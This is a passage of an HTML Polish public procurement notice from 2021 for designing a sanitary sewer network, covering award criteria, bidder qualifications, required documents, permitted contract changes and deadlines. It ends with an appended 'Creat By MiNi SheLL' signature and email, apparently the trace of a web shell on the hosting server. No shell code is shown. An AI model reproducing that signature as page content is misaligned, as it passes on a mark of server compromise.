przedmiotem. Całkowita wartość tego zamówienia została uwzględniona przy obliczaniu wartości zamówienia podstawowego. Warunki udzielenia zamówienia:a)	zamówienie zostanie udzielone po przeprowadzeniu procedury przewidzianej dla zamówienia z wolnej ręki, w szczególności poprzez zaproszenie wykonawcy do negocjacji oraz negocjacje z wykonawcą;b)	dotychczasowy wykonawca realizował usługi objęte zamówieniem podstawowym w terminie i z najwyższą starannością,c)	wykonawca będzie musiał wykazać spełnienie warunków udziału w postępowaniu, które zostaną określone przez Zamawiającego, oraz przedłożyć stosowne dokumenty i oświadczenia na potwierdzenie spełnienia tych warunków, w zakresie określonym przez Zamawiającego;d)	wykonawca będzie musiał wykazać brak podstaw do wykluczenia oraz przedłożyć stosowne dokumenty i oświadczenia na potwierdzenie braku podstaw do wykluczenia,e)	wykonawca będzie zobowiązany zapewnić nie gorszy standard wykonywania nowego zamówienia niż podstawowego oraz zaakceptować istotne postanowienia dotychczasowej umowy o zamówienie podstawowe,f)	przedmiotem negocjacji z wykonawcą będą w szczególności: oferowana przez wykonawcę cena oraz szczegółowe warunki realizacji zamówienia (w tym termin wykonania zamówienia oraz okresu gwarancji jakości) z zachowaniem wymogów określonych przez Zamawiającego w opisie przedmiotu zamówienia i warunkach przyszłej umowy o zamówienie publiczne.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za pomocą kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Za pomocą kryteriów oceny ofert <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie zdolności technicznej lub zawodowej Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że: a)	posiada doświadczenie zawodowe polegające na wykonaniu w okresie ostatnich 3 lat przez upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi polegającej na wykonaniu dokumentacji projektowej sieci kanalizacji sanitarnej w systemie grawitacyjno-tłocznym o długości co najmniej 8 km; wraz z załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;b)	dysponowania osobami zdolnymi do wykonania przedmiotu zamówienia, w tym co najmniej jedną osobą posiadającą uprawnienia projektowe bez ograniczeń w branży sanitarnej w zakresie sieci wodociągowych i kanalizacyjnych;Doświadczenie osoby, o której mowa w w/w pkt b) stanowi II kryterium oceny ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.2)	Dokumenty, o których mowa powyżej (Rozdz. VII cz. A ust. 3 SWZ) , składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wraz z ofertą Wykonawca jest zobowiązany złożyć aktualneoświadczenie, o którym mowa w art. 125ust. 1 PZP, o niepodleganiu wykluczeniu oraz spełnianiuwarunków udziału w postępowaniu, wg wzorustanowiącego Załącznik nr 2 do SWZ.1) W przypadkuwykonawców wspólnie ubiegających się oudzielenie zamówienia, oświadczenie, o którym mowa w art.125 ust. 1 PZP, składa każdy z tychwykonawców, wg wzoru stanowiącego Załącznik nr 2 do SWZ.Oświadczenia te potwierdzają brakpodstaw wykluczenia oraz spełnianie warunków udziału wpostępowaniu w zakresie, w jakim każdy zwykonawców wykazuje spełnianie warunków udziału wpostępowaniu.2) Wykonawca, w przypadkupolegania na zdolnościach lub sytuacji podmiotówudostępniających zasoby, przedstawia wrazoświadczeniem, o którym mowa w art. 125 ust. 1 PZP,także oświadczenie podmiotu udostępniającegozasoby, potwierdzające brak podstaw wykluczeniatego podmiotu oraz odpowiednio spełnianiewarunków udziału w postępowaniu w zakresie, w jakimwykonawca powołuje się na jego zasoby, wgwzoru stanowiącego Załącznik nr 3 do SWZ. Wykonawcaw powyższej sytuacji dołącza takżeZobowiązanie podmiotu udostępniającego zasoby składane napodstawie art.118 ust. 3 i 4 ustawy Pzpzgodnie z wzorem stanowiącym Załącznik nr 4 do SWZ.2.Podmiotowe środki dowodowe dotyczącepotwierdzenia spełniania warunków udziału w postępowaniu,składane na wezwanie Zamawiającegoprzez wykonawcę, którego oferta została najwyżej oceniona (wterminie wyznaczonym przezZamawiającego, nie krótszym niż 5 dni):1) wykazu usług wykonanych, aw przypadku świadczeńpowtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3lat, a jeżeli okresprowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości,przedmiotu, datwykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniemdowodówokreślających czy te usługi zostały wykonane lub są wykonywane należycie, przy czymdowodami, októrych mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzeczktóregodostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lubciągłych sąwykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanieuzyskać tychdokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lubciągłychnadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należytewykonywaniepowinny być wystawione w okresie ostatnich 3 miesięcy;2) wykazu osób, skierowanychprzez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych zaświadczenieusług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami natemat ichkwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych dowykonaniazamówienia publicznego, a także zakresu wykonywanych przez nie czynności orazinformacją opodstawie do dysponowania tymi osobami;3) oświadczenia na temat wykształcenia ikwalifikacjizawodowych wykonawcy lub kadry kierowniczej wykonawcy;4) Jeżeli wykonawca powołujesię nadoświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz:- októrymmowa powyżej dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył,a wprzypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniubezpośredniouczestniczył lub uczestniczy.5) Dokumenty, o których mowa powyżej (w Rozdz. VII cz. A ust. 2 SWZ), składająłącznie wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub też zosobna każdyz Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) uzupełniony formularz ofertowy, zgodnie z załącznikiem nr 1 do SIWZ,3)aktualneoświadczenie Podmiotu udostępniającego zasoby, o którym mowa w art. 125 ust. 5PZP, oniepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, wgwzorustanowiącego Załącznik nr 3 do SWZ – jeśli dotyczy,4) ZobowiązaniePodmiotuudostępniającego zasoby wg wzoru stanowiącego Załącznik nr 4 do SWZ - jeślidotyczy,5)Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie wg wzorustanowiącegoZałącznik nr 5 do SWZ - jeśli dotyczy2. Wraz z ofertą, Wykonawca ma obowiązekzłożyć:1)odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i InformacjioDziałalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia, żeosobadziałająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawcanie jestzobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać zapomocąbezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał daneumożliwiającedostęp do tych dokumentów;2) jeżeli w imieniu wykonawcy działa osoba, którejumocowanie dojego reprezentowania nie wynika z dokumentów, o których mowa w punkciepoprzedzającym:pełnomocnictwo lub inny dokument potwierdzający umocowanie doreprezentowaniawykonawcy;3) pełnomocnictwo do reprezentowania Wykonawców wspólnieubiegających się oudzielenie zamówienia - o ile dotyczy;4) w przypadku wnoszenia wadium wformie innej niżpieniężna – oryginał dokumentu wadialnego (gwarancji lub poręczenia) – o iledotyczy.3. JeżeliWykonawca polega na zdolnościach technicznych lub zawodowychpodmiotówudostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotuudostępniającegozasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzebyrealizacji danegozamówienia lub inny podmiotowy środek dowodowy potwierdzający, żeWykonawca realizujączamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.Zobowiązaniepodmiotu udostępniającego zasoby, o którym mowa w zdaniu poprzedzającym,musipotwierdzać, że stosunek łączący Wykonawcę z podmiotami udostępniającymizasobygwarantuje rzeczywisty dostęp do tych zasobów oraz musi określać w szczególności:1)zakresdostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;2) sposób iokresudostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotuudostępniającego tezasoby przy wykonywaniu zamówienia;3) czy i w jakim zakresie podmiotudostępniający zasoby,na zdolnościach którego Wykonawca polega w odniesieniu do warunkówudziału wpostępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lubdoświadczenia,zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:1)wodniesieniu do warunków udziału w postępowaniu wskazanych w Rozdziale VI ust. 1 pkt 3 (lit.a)i b)) tj. w zakresie zdolności technicznej i zawodowej wykonawcy wspólnie ubiegający sięoudzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzywykonająusługi, do realizacji których te zdolności są wymagane;2) w przypadku, o którym mowaw pkt 1wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do ofertyoświadczenie,z którego wynika, które usługi wykonają poszczególni wykonawcy, wg wzorustanowiącego zał.nr 5 do SWZ;3) wykonawcy są zobowiązani ustanowić pełnomocnika doreprezentowania ich wpostępowaniu o udzielenie zamówienia albo reprezentowania wpostępowaniu i zawarciaumowy w sprawie zamówienia publicznego - pełnomocnictwo powinnobyć złożone wraz zofertą;4) Z Wykonawcami wspólnie ubiegającymi się o udzieleniezamówienia (np. konsorcjum,spółka cywilna), Zamawiający będzie się porozumiewał zapośrednictwem pełnomocnikaWykonawców wskazanego w pełnomocnictwie5) Wykonawcywspólnie ubiegający się oudzielenie zamówienia ponoszą solidarną odpowiedzialność zawykonanie umowy i wniesieniezabezpieczenia należytego wykonania umowy.6) W przypadkuWykonawców wspólnieubiegających się o udzielenie niniejszego zamówienia, których ofertazostanie wybrana,Wykonawcy zobowiązani będą zawrzeć umowę regulującą współpracę tychWykonawców iprzedłożyć tę umowę Zamawiającemu, przed zawarciem umowy w sprawiezamówieniapublicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, napodstawie której dokonano wyboru Wykonawcy, mających na celu prawidłową realizacjęprzedmiotu zamówienia, w następujących przypadkach: a) gdy nastąpi zmiana powszechnieobowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy – w zakresieobjętym zmianą;b) dopuszcza się zmianę osób biorących udział w wykonaniu zamówieniawskazanej w załączniku do SIWZ. Z zastrzeżeniem, iż osoba ta musi zostać zastąpiona innąosobą o uprawnieniach nie gorszych niż posiadane przez osobę zastępowaną,c) gdy zmianybędą korzystne dla Zamawiającego i będą leżały w interesie publicznym;d) dopuszcza siępoprawę omyłek pisarskich i rachunkowych w treści umowy;e) gdy konieczność wprowadzeniazmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki nasfinansowanie zadania;f) dopuszcza się zmianę podwykonawcy, przy pomocy któregoWykonawca realizuje przedmiot umowy na innego po uprzedniej akceptacji Zamawiającego,g)dopuszcza się rezygnację z podwykonawcy, przy pomocy którego Zamawiający realizujeprzedmiot zamówienia.h) wstrzymania prac przez Zamawiającego,i) innych przyczynniezależnych od Wykonawcy (przy zachowaniu przez niego należytej staranności), skutkującychniemożliwością dotrzymania terminu zakończenia zadania,j) konieczność zmiany innychwarunków umowy, jeżeli w chwili jej zawarcia nieznane były fakty mające na nie wpływ, przyjednoczesnym założeniu, ze zakres zmian spowoduje następstwa korzystne dlaZamawiającego,k) zmiany formy zabezpieczenia należytego wykonania umowy,l) dopuszcza się zmianę terminu wykonania umowy w przypadkach:- działania siły wyższej– termin wykonaniaprzedmiotu umowy może wówczas zostać przedłużony o czas trwania okoliczności: wszczególności z powodu: ogłoszenia stanu zagrożenia epidemiologicznego , stanu epidemii ,klęki żywiołowej, stanu nadzwyczajnego, w sytuacji gdy realizacja umowy w dotychczasowysposób nie jest możliwa na skutek siły wyższej.- wystąpienia warunków atmosferycznychodbiegających od typowych, uniemożliwiających prowadzenie prac terenowych – o czas trwaniatych warunków,- udokumentowania niezależnej od Zamawiającego i Wykonawcy przewlekłościpostępowania o uzyskanie od instytucji i urzędów dokumentów (np. pozwoleń, decyzji,uzgodnień) niezbędnych do realizacji umowy– termin wykonania przedmiotu umowy możewówczas zostać przedłużony o czas trwania okoliczności;- w przypadku wystąpieniaokoliczności niezależnych od Wykonawcy, a uniemożliwiających prawidłową realizacjęzamówienia przez Wykonawcę, - w przypadku protestów mieszkańców mających wpływ nawykonanie umowy, o czas trwania tych protestów, m) dopuszcza się rezygnację z wykonaniaczęści zamówienia, jeżeli nie jest to niezbędne do prawidłowego wykonania całości zamówienia– w takim przypadku stosownemu zmniejszeniu ulega wynagrodzenie Wykonawcy, n) dopuszcza się zmianę zakresu prac objętych daną częścią zamówienia w przypadku: - braku zgód właścicieli nieruchomości na projektowanie inwestycji na nieruchomościach do nich należących i konieczności odstąpienia od realizacji danej części, - braku możliwości sprowadzenia ścieków do pompowni wskazanych przez Zamawiającego w koncepcji (załącznik nr 10 do SWZ) i konieczności przeprojektowania spływu ścieków w kierunku innej pompowni; o) dopuszcza się zmianę wynagrodzenia Wykonawcy w przypadku zmiany zakresu prac w danej części zamówienia (zmniejszenie lub zwiększenie.Ze względu na niewystarczającą ilość miejsca pozostałyzakres możliwych zmian określony jest w załączniku nr 8 do SWZ - projekt umowy (par. 17-19). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pomocą miniPortalu https://miniportal.uzp.gov.pl/ adres skrytki ePUAPu Zamawiającego /UGGlusk/skrytka</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-24 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-13 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com